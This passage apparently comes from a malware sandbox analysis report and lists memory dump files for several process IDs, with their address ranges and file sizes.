                                                                                                              120KB

                                                                                                            • memory/6132-321-0x0000000007F60000-0x00000000085DA000-memory.dmp
                                                                                                              Filesize

                                                                                                              6.5MB

                                                                                                            • memory/6132-322-0x0000000007900000-0x000000000791A000-memory.dmp
                                                                                                              Filesize

                                                                                                              104KB

                                                                                                            • memory/6132-323-0x0000000007950000-0x000000000795A000-memory.dmp
                                                                                                              Filesize

                                                                                                              40KB

                                                                                                            • memory/6132-324-0x0000000007B60000-0x0000000007BF6000-memory.dmp
                                                                                                              Filesize

                                                                                                              600KB

                                                                                                            • memory/6132-325-0x0000000007B30000-0x0000000007B3E000-memory.dmp
                                                                                                              Filesize

                                                                                                              56KB

                                                                                                            • memory/6132-313-0x0000000005030000-0x0000000005066000-memory.dmp
                                                                                                              Filesize

                                                                                                              216KB

                                                                                                            • memory/6132-327-0x0000000007C10000-0x0000000007C18000-memory.dmp
                                                                                                              Filesize

                                                                                                              32KB

                                                                                                            • memory/6132-312-0x0000000000000000-mapping.dmp
                                                                                                            • memory/6184-256-0x0000000000000000-mapping.dmp
                                                                                                            • memory/6352-263-0x0000000000000000-mapping.dmp
                                                                                                            • memory/6444-268-0x0000000000000000-mapping.dmp
                                                                                                            • memory/6452-338-0x0000023155FF0000-0x0000023156010000-memory.dmp
                                                                                                              Filesize

                                                                                                              128KB

                                                                                                            • memory/6452-339-0x0000023157AF0000-0x0000023157B30000-memory.dmp
                                                                                                              Filesize

                                                                                                              256KB

                                                                                                            • memory/6452-340-0x0000023156040000-0x0000023156060000-memory.dmp
                                                                                                              Filesize

                                                                                                              128KB

                                                                                                            • memory/6452-343-0x0000023156040000-0x0000023156060000-memory.dmp
                                                                                                              Filesize

                                                                                                              128KB

                                                                                                            • memory/6624-277-0x0000000000000000-mapping.dmp
                                                                                                            • memory/6664-279-0x0000000000000000-mapping.dmp
                                                                                                            • memory/6752-281-0x0000000000000000-mapping.dmp
                                                                                                            • memory/6832-283-0x0000000000000000-mapping.dmp
                                                                                                            • memory/7124-285-0x0000000000000000-mapping.dmp